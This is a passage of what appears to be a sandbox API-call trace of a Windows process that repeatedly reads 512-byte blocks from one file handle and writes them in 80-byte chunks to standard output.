lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.541] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.541] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0107.541] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] 
GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.542] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.542] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | 
out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] GetFileType (hFile=0x4c) returned 0x1 [0107.542] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.542] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, 
lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] GetFileType (hFile=0x4c) returned 0x1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.543] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.543] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.543] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.543] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.544] GetFileType (hFile=0x4c) returned 0x1 [0107.544] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.545] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) 
returned 1 [0107.545] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.545] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.545] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.545] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.546] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.546] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] GetFileType (hFile=0x4c) returned 0x1 [0107.546] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.546] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, 
lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] GetFileType (hFile=0x4c) returned 0x1 [0107.547] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.547] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.548] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.548] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] GetFileType (hFile=0x4c) returned 0x1 [0107.548] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.548] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.549] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.549] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] GetFileType (hFile=0x4c) returned 0x1 [0107.549] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.549] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] GetFileType (hFile=0x4c) returned 0x1 [0107.550] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.550] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, 
